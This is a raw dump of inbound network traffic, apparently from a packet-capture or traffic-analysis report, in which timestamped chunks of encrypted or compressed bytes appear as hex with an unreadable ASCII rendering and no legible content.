                                                                                                                                                            2022-09-29 12:45:27 UTC36030INData Raw: 27 0c 09 5a 4b dc dc ac a7 bc 4d 20 b1 9e 74 2d d6 34 f9 f9 1c 7f 92 7d a4 b7 57 cf 6d b5 74 5a 15 84 59 08 4f d7 08 9d b8 87 7c cc ce e0 2d 5f 40 16 91 73 31 63 39 e5 93 56 1f 74 e5 e7 80 21 e0 c5 21 1c 88 77 11 96 37 47 8c f5 1a 3a 07 93 64 60 a0 27 e5 2e 74 de 67 15 36 d3 58 44 a0 ce 0c 4b 2c 93 83 8f c3 f0 c0 71 73 62 ef 76 73 d6 97 8b 02 40 4a 8c cf b9 d3 a8 ad 16 a3 6f df f3 3e 10 38 65 8a c6 07 db 81 90 4d 70 17 67 55 1f 60 d7 3c 48 65 ca 7c d4 e9 e5 19 53 df 4b 80 01 8f 29 7f 31 1b c5 07 ee 07 9e d7 ef d4 b2 33 34 4f 2a 0d 97 7b 3f a4 95 63 72 2c 87 a7 47 4e e8 39 5c 8e b2 9c f6 d3 80 af 3d 86 0a 6a dc 17 12 b2 97 00 6e b1 32 74 98 cc 13 0f 0b 83 51 6b eb c3 b3 42 28 e4 0d db 4a 75 62 49 b3 f1 9f b2 69 ce e4 89 ca b9 cb 29 d6 34 a3 a9 81 0a 2c a0
                                                                                                                                                            Data Ascii: 'ZKM t-4}WmtZYO|-_@s1c9Vt!!w7G:d`'.tg6XDK,qsbvs@Jo>8eMpgU`<He|SK)134O*{?cr,GN9\=jn2tQkB(JubIi)4,
                                                                                                                                                            2022-09-29 12:45:27 UTC36046INData Raw: 84 e2 af 92 2e aa 5d 36 40 df 18 7e 20 a4 24 ae 3f e8 23 74 36 79 0c 80 3d 68 b5 ea 00 6a a3 fd 3f c9 cf b8 99 29 a9 ce 7c 0f 4d 23 1f 2e 93 89 cb 76 04 b4 2b fc e9 e1 05 73 3f 98 8e 8a 6a 37 18 f1 37 86 56 0f 15 15 53 23 be 71 a8 92 34 29 da 55 37 9e 1c 89 44 a8 22 eb e2 b0 0c b1 70 69 5b 48 ec 44 4a 69 9a 30 75 dc be 0a 09 ee 33 73 c9 e8 dc 2d 45 ae df 8b 6b f7 17 4a ec 9a a6 83 1d ef a3 b3 85 8c f5 97 d1 49 0c 15 ff 12 65 48 32 bd 6e 34 76 6d 1e 80 1c f5 73 26 3f f6 5c b8 ad 37 45 84 9d 91 fc fe fc 28 6d 1a 02 0a 74 f6 31 96 e9 f7 51 24 cf b0 5a 54 94 3b aa f9 94 e2 80 0c 20 91 45 68 d0 96 bb 06 0c 86 16 c0 69 16 99 e4 6a 50 3e ca da ec 93 58 c8 12 28 43 f0 f5 34 77 3f 90 e4 27 11 4c 8a 8c b4 7c bc fe c8 02 5b 31 97 6c c8 e7 74 17 b7 e8 91 a0 1a 9d 27
                                                                                                                                                            Data Ascii: .]6@~ $?#t6y=hj?)|M#.v+s?j77VS#q4)U7D"pi[HDJi0u3s-EkJIeH2n4vms&?\7E(mt1Q$ZT; EhijP>X(C4w?'L|[1lt'
                                                                                                                                                            2022-09-29 12:45:27 UTC36062INData Raw: d1 8f 88 e1 36 45 96 98 78 a3 1b 23 2f eb 86 b6 07 a9 71 5f f8 73 63 3b 4a 71 84 d0 73 48 b7 0e 84 30 97 61 51 0f fd 71 b9 ac e8 23 ae 08 80 d3 7c 29 14 d5 be 2e fc de 32 36 be 48 e5 40 ee 71 bf 02 a1 ef 9b 64 c8 01 3a f5 c2 03 23 76 f5 0a b8 5b e8 ee 7b e1 b9 80 b6 a2 8b 7f b5 2a 0d 0b 97 96 75 dc c8 c9 c7 ae 41 0b a1 6a 39 c3 fb 76 32 6b 15 96 a8 c8 9e 60 80 c3 2e 95 1b 15 ce d2 59 5e 30 a6 66 33 f6 f0 e4 e1 b9 68 3b cd 74 11 a7 5c 07 50 6e 37 81 2d 66 23 e2 a6 f1 fb c3 f0 38 1c 4c de 2a 8a cf 82 7c 85 b9 f4 4c cd 3b ac 71 bb 84 a1 96 3f f9 76 7c 54 c6 1e 94 ad d5 94 c8 5c 84 95 59 76 a2 90 e4 55 88 7e 63 d7 18 3f 59 bd 82 47 ba b0 17 af cf e1 5d eb cc d0 85 90 e2 8f 35 2c ee 66 9c b0 88 2a 82 52 c8 a1 bc a4 5b 23 53 6b 06 7c 42 f8 c7 c9 75 b4 9e b5 32
                                                                                                                                                            Data Ascii: 6Ex#/q_sc;JqsH0aQq#|).26H@qd:#v[{*uAj9v2k`.Y^0f3h;t\Pn7-f#8L*|L;q?v|T\YvU~c?YG]5,f*R[#Sk|Bu2
                                                                                                                                                            2022-09-29 12:45:27 UTC36078INData Raw: ba 57 e6 ca 13 c9 25 58 e3 a5 bb 34 e2 ed 75 18 fa 92 07 3d c4 91 6a b6 eb aa a8 2a 74 70 f5 1b f6 7f af 89 1f 00 24 f8 b2 83 ff 09 0c 0e 93 a2 43 01 ff 85 e7 d1 ba 96 4b 83 dc d0 86 ba 70 82 b2 19 61 40 c1 5d 2e ec 04 a7 3b 0a 8f 75 ed 73 a7 24 97 51 e2 1d ba 03 67 8d 5d 82 ba e7 4c de c1 af 49 2e ae b7 14 bc f3 a6 9a 27 8b c7 d0 c7 37 cb 2a cc cc 9e 29 64 c9 3d 15 14 8a 8c 1d 1e 4a 52 72 84 d5 d2 3e 29 17 cd 26 89 1b 7b c2 ed 57 d2 20 96 86 7a cd 6a 09 05 01 92 9a 2e c8 3c fa a0 e9 46 c9 4d d3 ee e9 c5 41 3f 50 a7 a8 66 e4 ad 1f 78 73 98 b4 65 b9 5c 69 15 24 c8 3b af fb bd d2 7b f2 7a 73 a2 8b ab bf 6a 2b dc 6e e1 fb ff 45 83 20 f9 80 28 7f 06 a8 37 47 01 6d 36 09 3e 2d c6 8e c3 ee 57 a0 75 9f ec 90 9d f7 b8 d2 f6 ce 99 7a 3d a1 26 d9 86 f8 78 95 29 e4
                                                                                                                                                            Data Ascii: W%X4u=j*tp$CKpa@].;us$Qg]LI.'7*)d=JRr>)&{W zj.<FMA?Pfxse\i$;{zsj+nE (7Gm6>-Wuz=&x)
                                                                                                                                                            2022-09-29 12:45:27 UTC36094INData Raw: d3 12 a5 87 e2 e1 6c d9 92 da d6 68 b2 73 41 f8 b4 35 22 a5 97 8e 0a 18 cf 90 df 54 f2 3c 39 f8 85 59 32 02 3d b7 b5 ec 72 2b f6 e2 ac 1f b5 5e cd f6 e7 63 01 2f 8f 8e 96 d7 64 b8 2b 8e 4b cb 91 05 d0 d6 67 9e b4 d5 f9 c5 f9 88 77 e5 22 fc 4d 08 5c 07 76 05 30 06 7e 6c 6d 13 82 5d 85 f5 9b 25 f0 d0 31 b4 2b 79 f6 70 9a ae 42 f6 35 9c d6 b5 e0 60 ac b4 f4 83 a3 4b 71 a4 1d 21 06 0f 59 d0 03 9b 3a ee 37 1f 20 3b d5 5b cd 77 c6 36 bc db 2f 11 80 4e 9c c5 f8 95 b6 8c 16 cf b4 a5 e9 18 50 78 ee d7 73 42 50 92 4b bf 01 22 05 43 73 ff e3 a7 4d 66 fa 9b c4 8b 2a a4 7b 5d 60 bd 60 af cb dc 47 9f b0 2c 69 7f b4 21 e5 5f f6 d0 b5 b5 25 a4 03 46 74 47 0e 04 f4 82 ef 6f 84 8c 82 66 65 0b 86 ff ef 60 15 85 80 7f 52 df 4b 24 5c 91 6e d9 bd 92 f5 16 c7 0d 9f 32 17 fc 02
                                                                                                                                                            Data Ascii: lhsA5"T<9Y2=r+^c/d+Kgw"M\v0~lm]%1+ypB5`Kq!Y:7 ;[w6/NPxsBPK"CsMf*{]``G,i!_%FtGofe`RK$\n2
                                                                                                                                                            2022-09-29 12:45:27 UTC36110INData Raw: 5b 69 23 2d cb c2 4c 44 dd 8a a8 0c 70 cb cf 54 9a 7a 22 57 bd 99 59 34 49 8c 73 c2 4f 3a d7 b7 35 eb 59 fc 6d 43 5c 61 e6 10 70 d8 42 ae dc 43 c9 86 ce a9 99 31 be df 96 6e ab 54 6e 21 b4 88 13 dd 24 6b a2 e1 83 c9 8b 97 4c a7 b1 67 1b e3 83 2f 0a 22 4f f6 98 35 70 27 a8 0c 3d b0 f8 8c af 09 c7 c9 e1 8a 35 c1 de ea 8f ed 41 af 87 a7 c2 2c bc 6e 5a ae c7 13 09 01 02 1f c0 d2 6c 05 de 48 20 ea 74 5a 6b d5 4d 54 4f 54 cb d5 34 dd 52 fa 79 b0 4c f2 bc 2d 48 5d fd 41 2e a0 5e 40 40 e1 a1 7b 7a 9c 10 31 26 9f 60 b2 85 93 db 48 50 ed 5b 94 05 81 58 b5 48 27 d3 d2 4e cf fd 4c ff cf f1 dc ec ff 1b 79 70 52 fa 34 9a 51 64 d1 68 5f 29 91 31 5d b1 ec ce fb 67 b8 5f 25 1b 32 a1 ab 62 f5 85 1d 11 17 19 eb 0e 40 62 5c f9 c0 8a d9 43 c4 24 99 3c 53 0b 3e a0 b2 9e fa 52
                                                                                                                                                            Data Ascii: [i#-LDpTz"WY4IsO:5YmC\apBC1nTn!$kLg/"O5p'=5A,nZlH tZkMTOT4RyL-H]A.^@@{z1&`HP[XH'NLypR4Qdh_)1]g_%2b@b\C$<S>R
                                                                                                                                                            2022-09-29 12:45:27 UTC36126INData Raw: 8a 17 6b 72 02 af cf 4e 9e 9c 7d 20 55 db a4 c2 27 72 4e 15 3d 3d 41 9d f0 db 7a 0a 6c e9 0a 0f 19 d7 fb 74 d7 4d 21 e2 01 de 59 ed c7 70 4e 73 e6 e3 cd 27 a5 4d 5d 22 7a f4 50 a7 45 64 c4 ca 65 7e 08 55 bc a8 88 a4 7a c5 5c b5 f6 74 a7 5d d2 49 3b 87 f2 ef d4 c3 41 9a 6d af 42 80 39 79 b0 44 5c 5a 3b ec 60 53 48 71 75 8e c0 89 f4 d6 b2 40 ed f4 13 ac 26 09 92 9f 8b 9e a4 77 ca 1c 85 77 6f d4 c2 48 19 61 89 7f a9 4e ab 2b 05 0b a6 7d 35 09 f6 1b 15 f4 29 59 8b 65 55 c6 b0 a3 f9 7c d3 bd 0e f4 2a d0 d1 92 63 4f 38 84 c3 ec ca 82 19 c9 cf 0d 11 7a ac ea ca 6c 8f d4 b2 45 29 7b f9 5e d9 81 17 0e 11 34 61 da 1d c8 c2 9b a5 e2 70 06 7c 9e c6 03 36 ca d3 f0 78 7a 46 10 30 64 44 65 d1 97 d0 42 49 b9 36 a4 54 81 0a 89 6b 9e 8e 64 5b ff c8 1d 67 95 f3 8d 44 19 07
                                                                                                                                                            Data Ascii: krN} U'rN==AzltM!YpNs'M]"zPEde~Uz\t]I;AmB9yD\Z;`SHqu@&wwoHaN+}5)YeU|*cO8zlE){^4ap|6xzF0dDeBI6Tkd[gD
                                                                                                                                                            2022-09-29 12:45:27 UTC36142INData Raw: fa 5f bf bc 45 cd 5e b8 1e 0a e5 43 e1 88 52 38 fc d8 5f af 12 d7 94 ff 73 9a 3c 07 b9 c9 5e ea 48 a3 50 43 84 a7 95 ed 88 56 ff 6e f4 69 99 8c 21 44 e0 cb 27 3d cf a7 aa f0 7e 6d 1a 9a 15 e6 75 f3 b7 7d f0 52 67 50 a1 b8 94 8d c8 8c b5 74 2f 61 e6 ad 7b 48 bf 16 45 91 96 cc 27 9d 09 01 ae f5 8c b5 de 92 b3 65 5d bc a5 5e b9 82 d8 fd bf 37 c0 46 07 e1 7b d1 49 43 52 7e 57 94 d8 ac 2a 86 65 05 b9 18 1f 02 46 cc 20 50 d6 e8 04 27 8e 9c 4e b7 f8 e6 1d 1c 68 3f 76 0b b3 39 64 24 37 a0 3d 42 8a 8d f4 6d fc 33 cd 36 21 54 30 6d 9a d1 2f 0f df 99 a9 9f 55 74 90 ab 75 57 7b 1f 72 54 a6 c2 2d 64 10 f7 bc a2 ce b7 70 0d 86 e8 3c 30 d9 6e 85 68 25 53 a6 f9 54 8e 17 01 f9 fe cf ad 92 58 2a 56 88 00 cd 0b 2e bd 39 23 35 63 01 ca e0 64 56 3c f5 1f ce 14 d1 d3 63 f0 49
                                                                                                                                                            Data Ascii: _E^CR8_s<^HPCVni!D'=~mu}RgPt/a{HE'e]^7F{ICR~W*eF P'Nh?v9d$7=Bm36!T0m/UtuW{rT-dp<0nh%STX*V.9#5cdV<cI
                                                                                                                                                            2022-09-29 12:45:27 UTC36158INData Raw: 29 4b d3 46 e1 49 af bd 3b 1c c7 c7 ba 49 f5 ce e9 d2 b8 d9 fc dc b8 a4 67 8e 2b a8 39 52 f8 a1 14 1b d2 cf c1 6f e4 e0 e1 2c 01 4b cd dc 74 73 2c e6 d8 1b 0d b2 e2 ec 50 bb cc 3a d7 02 61 83 57 2d fa 95 0a 6c f2 53 64 e7 ab 94 38 6a 7a 18 f9 71 f6 a3 73 1c 0c 23 b8 4e 4a 39 c2 43 f0 2d fd 59 bb af 6a b8 41 80 da 40 13 74 b5 92 cc 2a db 3a 00 b5 e8 40 79 db bd c9 00 c3 0f 7d 56 10 54 7f 6a c9 f3 7a 0b ba 32 02 fe 04 5e ff b8 3e 7e 0a 68 70 06 52 5f bf fe 50 3e 7d 75 fc 20 f5 de f8 0b fa 61 21 9b 1e 61 e5 4b e6 35 23 eb 84 74 70 9b f9 c9 ba 70 c9 16 db a6 0b 73 da aa b3 5b 78 6f 35 97 ab 38 3d 15 1a 9c 8a 2e f9 93 aa 5d fc 94 f5 b5 a3 2a 2d b7 2a 49 1f 87 ee 48 05 15 99 9f 03 c1 fb 02 1b d1 97 5b 2e 80 8f ff 55 e5 ee bb 42 77 f8 83 c8 5e 7e 5e 63 c4 5e 16
                                                                                                                                                            Data Ascii: )KFI;Ig+9Ro,Kts,P:aW-lSd8jzqs#NJ9C-YjA@t*:@y}VTjz2^>~hpR_P>}u a!aK5#tpps[xo58=.]*-*IH[.UBw^~^c^
                                                                                                                                                            2022-09-29 12:45:27 UTC36168INData Raw: 64 29 a0 e9 29 16 5a fe cd 22 3c 49 12 f3 d5 34 88 c9 9c 36 54 4f ec 5b bd 8e 7e 0c a0 6f 6b b0 4d a7 9e 26 e7 56 09 31 00 5d 76 e5 19 ed 85 e4 e9 82 72 fb ef 67 f0 8d 93 c2 d8 cc 67 68 4b e4 8f 6f 7c ae 57 87 ff 72 3c f7 75 d6 09 df ab cc 39 9f 41 e2 40 ad 34 a4 78 60 1d 2a 93 5f c1 61 2f 0c 19 e8 c9 ec c8 95 65 16 57 42 05 f2 20 f4 04 08 c7 b9 f1 92 31 c0 b3 2b 92 95 c7 07 cb 42 18 62 cc bf 1f af 61 1c 2e 1e f4 a1 ae c2 e5 94 54 ae c2 1f 3e 39 98 07 5e 20 89 5c eb 5c 9d df ac 10 9f 20 c6 8d 1b 3a c2 a5 a6 ab e6 3d b6 8b c4 13 4d b0 dc d8 d2 87 7d f6 ee 7d b4 e2 70 4e b1 aa d5 ea 70 c1 bd 82 1e 99 4f 8b 9b 60 1a b0 71 b8 13 f0 e6 72 c7 e4 f6 36 d9 31 c4 02 c7 6a 38 ab 7e e9 fc d7 bf ac 93 dd d8 1a ed d2 df 60 d5 4b ae 33 06 20 b2 fb 6d 08 8e 51 bc 81 93
                                                                                                                                                            Data Ascii: d))Z"<I46TO[~okM&V1]vrgghKo|Wr<u9A@4x`*_a/eWB 1+Bba.T>9^ \\ :=M}}pNpO`qr61j8~`K3 mQ
                                                                                                                                                            2022-09-29 12:45:27 UTC36184INData Raw: 79 1f 16 9a 54 02 6a 43 34 ab 31 9b 1b a3 fe 81 90 40 f7 1f 2c 51 7e a4 b2 36 53 28 49 27 bb 38 75 bd c5 d8 a2 05 28 b3 03 7f 91 db 52 4c f1 ae 42 c7 3d f7 1f 22 b8 2d e3 0f 13 53 51 69 45 ee 7f c1 c8 80 02 20 eb a4 e0 05 53 30 01 82 92 34 06 58 73 9c d9 17 8b 47 1a ca 2a e0 87 01 e6 96 e8 8d 5b 81 d7 78 29 7b ab 8f 88 09 6c 18 f7 89 9e 5a dc 89 7a fc 66 3d a7 c3 b3 3d ce 56 f3 ad 27 73 c3 83 6f 9c 6a 8d 65 3a 2b 88 e0 a1 9b 6c a4 d6 34 9d 7c af b9 7d dd e6 ba 50 76 8c bc 3a 72 6b 70 c6 6b 62 e8 e6 81 33 a4 38 aa b3 0c 99 ea 3e 7a 5d b7 72 28 b3 98 f8 2a f5 2c c6 8e e5 c7 5e 85 fa 35 09 09 9a 3e ef 56 19 d4 ce b5 3b 12 02 a9 65 cc 8a 52 63 4d 7b d3 a2 41 84 18 3f 90 04 b4 7e e9 84 57 7f 3b d5 57 89 9f 84 45 c6 2a 37 18 ea 86 f0 47 9c c0 be 7a b5 69 7f fc
                                                                                                                                                            Data Ascii: yTjC41@,Q~6S(I'8u(RLB="-SQiE S04XsG*[x){lZzf==V'soje:+l4|}Pv:rkpkb38>z]r(*,^5>V;eRcM{A?~W;WE*7Gzi
                                                                                                                                                            2022-09-29 12:45:27 UTC36200INData Raw: b9 5c 28 ae fe 60 4b 66 c1 5e 08 aa 48 54 61 77 88 43 97 b2 5c d6 40 2e 6a aa e5 3f 33 d6 a9 8d a2 3c 7b d2 5a 46 ec 33 45 10 fa 18 29 77 17 37 c3 7f 1b 74 15 ab 69 ec 9e dc b3 00 1f d2 7a 45 c2 cf a9 6b a7 c6 32 9e b0 5b 11 f2 55 51 b6 38 38 84 34 69 be 55 10 d7 d6 4e 7a cd 6a e9 1a c2 23 ea 41 2a 2c 2d 90 ed 1b 98 d1 54 fc cf 11 fe da 1d 0f 3c 1e ec ad 6e 58 09 5b 69 06 a5 35 33 9f e2 2c ff 05 98 9e dc 97 9e f2 ac ab 40 96 6d 16 98 c4 cf 35 21 d7 5f 7a 4f 46 b1 c7 c8 27 1a 74 71 e2 0e 86 31 ce 8f 30 72 47 47 e0 88 24 38 c2 6f f8 13 d1 d2 6f aa 56 43 30 a0 4c 7d fc d4 6c d9 50 67 b7 73 6d 57 c5 4f 22 2d cf 14 c2 a5 9b b7 ad 18 c9 ab b8 fb 40 e9 4f 87 bb 1e 08 97 06 ca 1d d8 64 6d 4c 3b dd 27 d4 c4 39 2b 21 6e 54 0b 7c 4b 19 59 6b 0f 8a e7 bb eb 30 c5 73
                                                                                                                                                            Data Ascii: \(`Kf^HTawC\@.j?3<{ZF3E)w7tizEk2[UQ884iUNzj#A*,-T<nX[i53,@m5!_zOF'tq10rGG$8ooVC0L}lPgsmWO"-@OdmL;'9+!nT|KYk0s
                                                                                                                                                            2022-09-29 12:45:27 UTC36216INData Raw: 73 c7 c7 b0 35 6f 49 d8 ac 73 23 01 9f b6 87 08 9f 86 39 30 3b 6b 9b a1 d0 d8 aa 92 83 1c 52 78 db ab 20 c3 ad 92 1e 4a 89 d5 1b ec e9 d8 15 61 fe 8d f7 64 31 b0 77 80 77 e7 57 5f 22 fe 1d 09 c4 26 ab 5e b7 47 e5 bb 0f 03 63 8a 8e c0 4a ff a9 46 63 cc 80 7f 6c 2a 2e 1e b7 d4 be 22 ba b5 4d cd 04 c3 4c 42 81 5a 3d d8 91 90 65 51 30 75 7a 0f 4b f7 67 e0 3f 67 56 16 ef 32 6d ea 1c 95 aa b6 6c ac a6 0b 90 0e 4d 69 90 1e a0 39 95 c8 92 b3 80 14 0d 9e 47 0d 3b ce 57 c0 da 00 f2 cb 23 ba 46 4f 32 37 ad c6 a4 8c 90 c7 aa fa 1e 33 88 a2 df 24 3d 00 01 08 09 82 5c a4 3d ea a2 cd 0f 4e 70 a4 59 f7 1e 3a 0f 89 2e 94 c7 a2 a9 0b 6b 13 2e 27 ec 9a 4b 89 d4 67 07 7b 02 e3 49 14 29 79 3c 15 12 fb 03 45 95 90 80 52 c4 90 f2 a4 cb 5a 9f 4c 9b 01 1b fa ae 5a 38 d1 c4 02 5d
                                                                                                                                                            Data Ascii: s5oIs#90;kRx Jad1wwW_"&^GcJFcl*."MLBZ=eQ0uzKg?gV2mlMi9G;W#FO273$=\=NpY:.k.'Kg{I)y<ERZLZ8]
                                                                                                                                                            2022-09-29 12:45:27 UTC36232INData Raw: 47 10 91 78 4f e5 a7 cb 5f f4 40 a6 31 a3 0b 83 d8 16 e5 ed 5f 6a f2 68 36 80 73 58 c6 55 a0 83 5e 97 71 d7 43 7a 61 43 15 9c 54 63 ef 3d 0b 92 1a 42 40 bc 45 05 c9 b4 ab 5e 8d 3a 8b 7d 81 75 28 6a 29 d1 e6 e3 91 eb dc f5 fe f7 bc 10 82 62 ef 55 1e 4b bc 58 4c 26 9c 8f 99 7f 43 52 36 b4 25 23 d1 9c 1c db 3e 2a 81 d9 65 25 8a f2 91 c8 d5 4b 70 92 ac 20 35 d1 16 21 7e 91 57 ba f1 50 71 0b 46 8a 42 de 0c 86 f9 bd 9e 85 4f 54 07 4e 45 d0 19 b1 0e cb df fb a1 bd da 9e 0d eb cd c0 ec 35 59 19 46 30 c8 99 49 6d e4 58 c3 0c 18 72 f0 ad 4a fb 4c 0d d5 20 b1 00 ab 48 cd a8 59 8d da 21 51 dd 00 a9 c8 96 82 e8 e7 d2 f0 d4 8e c4 81 c9 c3 4a 76 b5 93 56 e5 8d 4e d5 50 d4 92 55 e5 4e 58 af 1b d2 55 ba 52 fc 8b a0 90 9f 4e b4 d0 f4 06 d8 c5 6e b8 61 b6 05 f9 46 53 70 79
                                                                                                                                                            Data Ascii: GxO_@1_jh6sXU^qCzaCTc=B@E^:}u(j)bUKXL&CR6%#>*e%Kp 5!~WPqFBOTNE5YF0ImXrJL HY!QJvVNPUNXURNnaFSpy
                                                                                                                                                            2022-09-29 12:45:27 UTC36248INData Raw: c9 6f 83 ae f0 c8 0b f9 5b ab 0b 9d f2 6c 3f b2 70 2f c3 4c 71 e2 54 2a da 22 73 dd 69 9c 61 7f f9 f4 19 8d 30 7b f7 d4 7b 81 97 9b 25 60 6c 4e 02 1e 45 1c 52 b3 8d 35 61 60 05 7e 4d 45 fa f5 19 b8 16 49 1b 23 05 1f 72 25 86 22 a7 73 4d 94 bb fd ca 85 57 55 63 3a c9 0e 48 dd 9a ca c2 27 bd 36 26 52 85 d0 20 b4 2d fb b1 51 7c ab 78 7b 21 b1 21 ac 5f 01 0c 2e db f5 ad 25 38 b3 f0 ec ac bc be 1e 89 77 23 a7 7f eb 3e 47 6e b8 b5 56 bf d8 26 c7 49 5d bb 44 7a 53 93 3f 35 9c 19 fc d1 06 8d 4a 5c 1a a3 ad 23 49 9f fc 2c e2 e9 4b 29 48 40 b0 88 5f 6d 56 eb 5f 6f 3c d7 12 6b 24 05 e1 d6 28 bd 03 6f 85 3d 2e 05 70 4f 4c 0c 6a 99 2d 81 20 b1 f0 e8 d4 25 e3 a4 28 b4 bd 0b 79 f5 37 70 bb 8a 54 04 57 a4 df 8b 22 ee 75 48 49 86 d5 2c 3e 4b 51 37 28 88 4d 7d fa 11 ef 7a
                                                                                                                                                            Data Ascii: o[l?p/LqT*"sia0{{%`lNER5a`~MEI#r%"sMWUc:H'6&R -Q|x{!!_.%8w#>GnV&I]DzS?5J\#I,K)H@_mV_o<k$(o=.pOLj- %(y7pTW"uHI,>KQ7(M}z
                                                                                                                                                            2022-09-29 12:45:27 UTC36264INData Raw: cf 83 3c d7 82 88 0a 87 f9 f5 ac 5f bd bc 95 b1 de 10 d9 bf 86 f4 8d 27 04 d0 49 bf 35 e2 d9 b0 99 34 d5 27 47 e8 f2 ae d2 f8 9b 59 53 cf 8c d7 28 c4 d9 77 25 56 05 d4 c0 7b 60 f8 03 b2 76 5c 7e 7d d5 1f 89 38 a9 57 1a b2 24 5b b7 ce 10 75 86 16 2f c4 ef 14 c3 c8 c4 be 1e 4a e6 6a 55 e5 92 6e 7e 61 42 9c 51 0b ae a3 9e 29 ab 91 55 bb 9b 9f 3b de d3 78 32 c9 ec 6f f7 94 3c 6d c0 71 73 91 83 8d 87 4f 72 31 48 ef eb 02 09 fa 8d ec d2 d0 bb 0d ac c5 6c 87 11 64 4a 68 80 cb f4 ec 2a 94 8d 8d f6 06 be 47 54 df 04 b9 56 d1 bb 67 fb 3b ce 48 90 9e f0 db 0e ac ab aa 20 1e 77 5c 46 d7 75 54 1f 91 57 89 1d 8c 46 ee f6 57 93 76 ca 71 08 ed 01 a9 1e 54 fa a8 c6 d1 a1 49 a4 a4 30 bc 62 53 1d 4d 83 7d 77 96 0c b1 0e 84 49 3f 8f ac 65 f8 0d d8 06 25 75 ec ff 88 5b 69 dd
                                                                                                                                                            Data Ascii: <_'I54'GYS(w%V{`v\~}8W$[u/JjUn~aBQ)U;x2o<mqsOr1HldJh*GTVg;H w\FuTWFWvqTI0bSM}wI?e%u[i
                                                                                                                                                            2022-09-29 12:45:27 UTC36280INData Raw: e5 4c b4 a7 a7 b4 f1 7c af 42 9c 11 d0 c2 a1 e5 ff 46 bd a8 cf 4e 96 27 87 46 f7 9f fe 37 1a 2c 5f 00 ee 97 a2 db 82 68 25 99 50 c4 48 27 2d ab 15 27 71 e2 9a 5e ea 19 b7 a3 ac 52 cb af f5 35 f5 f1 3a 0d 79 0f 0b c6 8f a2 a4 db d6 da e3 63 15 b5 00 8c ce 81 23 51 3d ad d6 d8 79 bf c0 a8 56 90 04 c2 16 3e a3 13 02 a6 f4 47 83 b3 34 6d 6b 8b 66 4c ee 92 74 7f b8 5c f0 d1 46 9e af 39 26 a9 34 9a f1 17 36 c3 be 6b 4b 4c dc 61 33 90 7e 21 49 f1 e4 72 68 93 22 ea c3 1c 0c 20 b5 7f ce 63 86 f2 ed 69 fd 63 f4 9d e7 7b 1b 6e ff ea 89 f5 80 cc 0c 40 c0 a9 43 8b 1c 82 50 d8 92 2d 49 0a 99 56 71 07 02 a4 ad c1 06 29 35 e5 2b f1 ed f1 8e 5c 6e ea 28 ff ff e1 ef 02 3d bc 78 30 f7 fd 6b ee bc 75 2e 1a 2c 17 fe c7 b4 82 62 31 31 ee ca a6 ef d4 84 15 43 16 3b 1e 9e 9d c8
                                                                                                                                                            Data Ascii: L|BFN'F7,_h%PH'-'q^R5:yc#Q=yV>G4mkfLt\F9&46kKLa3~!Irh" cic{n@CP-IVq)5+\n(=x0ku.,b11C;
                                                                                                                                                            2022-09-29 12:45:27 UTC36296INData Raw: e7 c5 99 21 c2 d8 86 07 00 c7 16 cb b1 fe 19 2a d9 bb b8 15 af 70 08 38 62 05 34 5a b8 3e db 91 6b c3 46 ad 26 3a 37 d4 eb 9e 48 f1 26 41 fd f1 f3 c3 47 25 a5 4e d4 0d a1 e1 7a 26 18 76 04 3c d9 ea f3 7e 7e 60 7a be 31 bd c0 94 1c 37 dc da aa a9 8c de db 9e e5 1e b6 0e d0 0b 9e 8a 5d 44 c0 7f ad a2 c1 4a c3 66 c8 30 c8 66 e3 19 e7 3c 22 12 f0 bf d2 eb f0 8a de 08 d9 0d b1 02 41 cf 6e 37 65 d7 a8 79 55 c3 43 7b 88 9a d2 83 78 d7 2c 26 4d 07 0e 02 4b 01 16 60 be 1a 3d 07 2c 2a f3 b7 6d 9a 1a af 8b e6 d2 95 46 71 12 74 63 2a 30 7b 4a 7e 6e 76 9e 48 ac 2e 90 36 7c e8 c9 19 02 4e 2c af b9 dc 44 d3 e8 b7 ea e0 4a f0 0a e6 aa 99 9d 5d ae 07 54 e7 16 ee 8d 9f 30 87 7e 31 45 15 f0 11 55 f5 37 6d 73 b8 b1 e9 e9 45 6b 7b 45 8c 09 3f 1d 88 66 de db 83 a7 5e fe 9a e6
                                                                                                                                                            Data Ascii: !*p8b4Z>kF&:7H&AG%Nz&v<~~`z17]DJf0f<"An7eyUC{x,&MK`=,*mFqtc*0{J~nvH.6|N,DJ]T0~1EU7msEk{E?f^
                                                                                                                                                            2022-09-29 12:45:27 UTC36312INData Raw: 68 c3 33 d0 ed fa 3c d4 95 06 27 bf bc ca 79 a1 90 cb 78 de 0e d4 e9 e5 13 7a d7 86 22 8d d4 7c f4 e0 ec 94 ab df dc 7b 65 49 3e 6c 49 c2 98 94 d1 41 40 ca a7 26 b2 e8 03 78 88 09 2d 33 52 c0 d6 7c 4e cc 59 77 b8 df f0 09 70 ca 6d 76 8e 7c 35 45 bc 89 63 ea 1e 9b b9 4e f9 99 c1 a4 73 ec bc 83 93 f8 11 25 90 05 78 d7 73 07 26 e2 e8 03 40 22 71 7c 7b 7d 79 3a f3 79 4c 7f 87 d1 97 94 ff 0c e0 b7 2f cf d1 85 43 7d 3f d5 e1 e1 6a 32 49 d6 6d 7a a9 c4 f7 c7 9a 94 3b a2 63 75 ed 6b a5 21 a2 41 89 54 67 00 54 d0 4b a4 af 5e 8a bf 49 63 7d 84 4e 15 9f 4b 50 73 fb 51 f5 e7 3f 47 70 69 68 1e 83 d4 a5 e7 ad 26 b6 fc cc 41 e1 bd b1 36 a7 b2 55 0a ff 93 69 f4 9e d9 0a 8a 7d 27 ce fe cd 34 9e c5 c8 c0 f3 19 90 a1 f6 46 fc 47 50 1d e8 cd c4 94 2f 56 5b 28 f0 dd a9 70 72
                                                                                                                                                            Data Ascii: h3<'yxz"|{eI>lIA@&x-3R|NYwpmv|5EcNs%xs&@"q|{}y:yL/C}?j2Imz;cuk!ATgTK^Ic}NKPsQ?Gpih&A6Ui}'4FGP/V[(pr
